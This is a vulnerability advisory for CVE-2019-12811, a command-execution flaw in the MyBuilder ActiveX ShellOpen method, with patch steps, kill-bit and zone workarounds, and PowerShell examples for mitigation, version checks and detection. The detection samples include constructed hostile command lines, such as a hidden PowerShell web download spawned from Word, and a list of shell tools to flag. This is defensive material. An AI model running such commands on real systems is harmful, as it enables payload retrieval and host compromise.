CVE-2019-12811
📋 TL;DR
This vulnerability allows remote attackers to execute arbitrary commands through the ShellOpen method of the MyBuilder ActiveX control: a crafted page viewed in Internet Explorer (or any other host that instantiates the control) can call the method with an attacker-chosen command, which runs with the privileges of the logged-in user. Attackers can leverage this for full compromise of the workstation. Users of MyBuilder before version 6.2.2019.814 are affected.
💻 Affected Systems
- MyBuilder ActiveX control, versions before 6.2.2019.814
📦 What is this software?
MyBuilder by Activesoft, an ActiveX control loaded in-process by Internet Explorer and other ActiveX hosts. The control's ShellOpen method is the vulnerable entry point.
⚠️ Risk & Real-World Impact
Worst Case
Complete takeover of the affected workstation. The command runs as the user who loaded the page, so where that user is a local administrator this means administrative control, data theft, ransomware deployment, and lateral movement across the network.
Likely Case
Arbitrary command execution as the browser user, leading to malware installation, credential theft, and establishment of a persistent backdoor.
If Mitigated
Limited impact if the control is kill-bitted or ActiveX is disabled or restricted via security zones, at the cost of whatever functionality depends on the control.
🎯 Exploit Status
Exploitation is straightforward: a crafted web page viewed in Internet Explorer, or an Office document that instantiates the control, scripts a call to ShellOpen with the attacker's command. Because the flaw is in what the method does rather than in memory handling, no exploit development beyond scripting the method call is needed; the only prerequisites are that the vulnerable control is installed and not kill-bitted, and that the victim loads the content in a host that will instantiate it.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.2.2019.814 or later
Vendor Advisory: https://www.boho.or.kr/krcert/secNoticeView.do?bulletin_writing_sequence=35155
Restart Required: Yes
Instructions:
1. Download the latest MyBuilder version from the official vendor site.
2. Uninstall the previous version.
3. Install the updated version.
4. Restart the system.
5. Re-check the installed version (see How to Verify below).
🔧 Temporary Workarounds
Disable ActiveX Control via Kill Bit
Set the kill bit in the registry so that Internet Explorer refuses to load the control. Replace {CLSID} with the control's class ID; this page does not list it, so locate it under HKCR\CLSID by finding the subkey whose InprocServer32 entry points at the MyBuilder DLL. On 64-bit Windows, set the same value under HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID} as well, since 32-bit IE reads the redirected hive.
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}" /v "Compatibility Flags" /t REG_DWORD /d 0x400 /f
Restrict ActiveX via Internet Explorer Security Zones
Configure IE to disable "Run ActiveX controls and plug-ins" (and "Initialize and script ActiveX controls not marked as safe for scripting") in the Internet and Trusted sites zones, via Internet Options > Security > Custom level, or push the same settings through Group Policy.
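The two workarounds above as an added PowerShell example (not from the vendor advisory or this page): it sets the kill bit in both the native and WOW64 hives, verifies it, and disables ActiveX per zone. The CLSID of the MyBuilder control is not given on this page, so it is a parameter; the zone action IDs and flag values are standard Internet Explorer registry settings. Run from an elevated session.

```powershell
# Added example, not vendor code. Locate the control's CLSID under HKCR:\CLSID
# (the subkey whose InprocServer32 default value points at the MyBuilder DLL).

function Set-ActiveXKillBit {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [ValidatePattern('^\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$')]
        [string]$Clsid
    )
    # Compatibility Flags 0x400 is the kill bit: IE refuses to instantiate the
    # control in any zone, even where the user has ActiveX enabled.
    $keys = @(
        "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
        # 32-bit IE on 64-bit Windows reads the WOW64-redirected hive, so set both.
        "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    )
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
        New-ItemProperty -Path $k -Name 'Compatibility Flags' -PropertyType DWord -Value 0x400 -Force | Out-Null
    }
}

function Test-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid)
    $k = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = (Get-ItemProperty -Path $k -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    # True only if the kill bit is present in the flags value.
    return ($null -ne $flags) -and (($flags -band 0x400) -ne 0)
}

function Disable-ActiveXInZone {
    # Per-user zone settings: 1 = Local intranet, 2 = Trusted sites, 3 = Internet.
    param([Parameter(Mandatory)][ValidateSet(1, 2, 3)][int]$Zone)
    $k = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\$Zone"
    # Action IDs: 1200 = "Run ActiveX controls and plug-ins",
    #             1201 = "Initialize and script ActiveX controls not marked as safe".
    # Value 3 = Disable (0 = Enable, 1 = Prompt).
    foreach ($action in '1200', '1201') {
        Set-ItemProperty -Path $k -Name $action -Type DWord -Value 3
    }
}

# Usage: substitute the real class ID for the {CLSID} placeholder.
# Set-ActiveXKillBit -Clsid '{CLSID}'
# Test-ActiveXKillBit -Clsid '{CLSID}'
# Disable-ActiveXInZone -Zone 3; Disable-ActiveXInZone -Zone 2
```

The zone settings above are per-user (HKCU); to enforce them machine-wide, deploy the same action values under the equivalent key beneath HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones via Group Policy, which also carries the kill bit to every domain workstation at once.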
🧯 If You Can't Patch
- Disable ActiveX entirely in Internet Explorer settings, or use a browser without ActiveX support for untrusted content
- Use application control (for example AppLocker DLL rules) to block the MyBuilder control's DLL from loading into browsers and Office; the control runs in-process, so rules on executables alone will not stop it
🔍 How to Verify
Check if Vulnerable:
Check the installed MyBuilder version via Help > About, or in the registry under HKLM\SOFTWARE\MyBuilder (value name Version; a 32-bit install on 64-bit Windows may register under HKLM\SOFTWARE\Wow6432Node\MyBuilder instead).
Check Version:
reg query "HKLM\SOFTWARE\MyBuilder" /v Version
Verify Fix Applied:
Confirm the installed version is 6.2.2019.814 or later, comparing it as a four-part version rather than as a string (lexically, 6.2.2019.1000 sorts before 6.2.2019.814). If you applied the kill-bit workaround, also confirm that Compatibility Flags is 0x400 under the ActiveX Compatibility key for the control's CLSID. Exercising ShellOpen from a test page with harmless parameters is only a secondary check and belongs on an isolated machine.
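The version check as an added PowerShell example (not the vendor's or this page's code). It reads the registry location stated above, which this example does not independently verify, falls back to a Wow6432Node path as an assumption for a 32-bit install on 64-bit Windows, and compares with [version] so that a four-part version with a larger last component is not mistaken for an older release.

```powershell
# Added example, not vendor code. Registry paths are taken from this page (first)
# and assumed for WOW64 (second).

function Get-MyBuilderInstalledVersion {
    foreach ($k in 'HKLM:\SOFTWARE\MyBuilder', 'HKLM:\SOFTWARE\Wow6432Node\MyBuilder') {
        $v = (Get-ItemProperty -Path $k -Name Version -ErrorAction SilentlyContinue).Version
        if ($v) { return [string]$v }
    }
    return $null
}

function Test-MyBuilderPatched {
    param(
        # Pass a version string to evaluate it directly (for example from an
        # inventory export); omit it to read the local registry.
        [string]$InstalledVersion,
        [version]$FixedVersion = [version]'6.2.2019.814'
    )
    if (-not $InstalledVersion) { $InstalledVersion = Get-MyBuilderInstalledVersion }
    if (-not $InstalledVersion) { return $null }   # not installed, or version not recorded
    $parsed = $null
    if (-not [version]::TryParse($InstalledVersion, [ref]$parsed)) {
        throw "Cannot parse version string '$InstalledVersion'"
    }
    # [version] compares component by component, unlike string comparison.
    return [bool]($parsed -ge $FixedVersion)
}

# Usage:
# Test-MyBuilderPatched                                   # local machine
# Test-MyBuilderPatched -InstalledVersion '6.2.2019.1000'  # from an inventory value
```

A result of $null means the registry value was not found, which is not the same as patched: check Help > About or the installed DLL's file version before treating the host as clean.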
📡 Detection & Monitoring
Log Indicators:
- Process creation from iexplore.exe or office applications spawning unusual child processes
- Registry modifications to ActiveX compatibility settings
Network Indicators:
- HTTP requests to unusual domains following ActiveX instantiation
- Outbound connections from unexpected processes
SIEM Query:
Process Creation where (ParentImage endswith "\iexplore.exe" OR ParentImage endswith "\winword.exe" OR ParentImage endswith "\excel.exe" OR ParentImage endswith "\powerpnt.exe") AND (Image endswith "\cmd.exe" OR Image endswith "\powershell.exe" OR Image endswith "\wscript.exe" OR Image endswith "\cscript.exe" OR Image endswith "\mshta.exe")
Match on the child's Image rather than its CommandLine, since "cmd" without ".exe" would slip past a CommandLine-contains check. Expect some true-but-benign hits from Office add-ins and tune by command line and user.
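The detection above as an added PowerShell example run over constructed Sysmon-style process-creation records (Event ID 1 fields; the records are made up for this example and are not real telemetry, and the parent and child process lists are assumptions). It is not code from this page or from any vendor.

```powershell
# Added example, not from the page. Field names follow Sysmon Event ID 1
# (UtcTime, User, ParentImage, Image, CommandLine).

$ParentsOfInterest  = 'iexplore.exe', 'winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe'
$SuspiciousChildren = 'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe'

function Find-ActiveXSpawnedShells {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        # Compare on the image file name (last path element), not the command line,
        # so "cmd" without ".exe" on the command line is still caught.
        $parent = ($e.ParentImage -split '[\\/]')[-1]
        $child  = ($e.Image -split '[\\/]')[-1]
        # -contains is case-insensitive, so WINWORD.EXE matches winword.exe.
        if ($ParentsOfInterest -contains $parent -and $SuspiciousChildren -contains $child) {
            [pscustomobject]@{
                UtcTime     = $e.UtcTime
                User        = $e.User
                Parent      = $parent
                Child       = $child
                CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample records, not real telemetry.
$SampleEvents = @(
    [pscustomobject]@{ UtcTime = '2019-08-20 09:12:03'; User = 'CORP\alice'
        ParentImage = 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
        Image       = 'C:\Windows\SysWOW64\cmd.exe'
        CommandLine = 'cmd /c whoami > C:\Users\Public\w.txt' }
    [pscustomobject]@{ UtcTime = '2019-08-20 09:12:05'; User = 'CORP\alice'
        ParentImage = 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
        Image       = 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
        CommandLine = '"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1234 CREDAT:75777' }
    [pscustomobject]@{ UtcTime = '2019-08-20 09:15:41'; User = 'CORP\bob'
        ParentImage = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
        Image       = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        CommandLine = 'powershell -w hidden -c "Invoke-WebRequest http://example.invalid/a"' }
    [pscustomobject]@{ UtcTime = '2019-08-20 09:20:00'; User = 'CORP\carol'
        ParentImage = 'C:\Windows\explorer.exe'
        Image       = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'cmd.exe' }
)

Find-ActiveXSpawnedShells -Events $SampleEvents | Format-Table -AutoSize
```

Of the four sample records, only alice's cmd.exe under iexplore.exe and bob's powershell.exe under WINWORD.EXE match; the IE child-frame launch and the explorer-launched cmd.exe do not. To run this against live data, build the same objects from `Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1 }` by reading the named fields out of each event's XML.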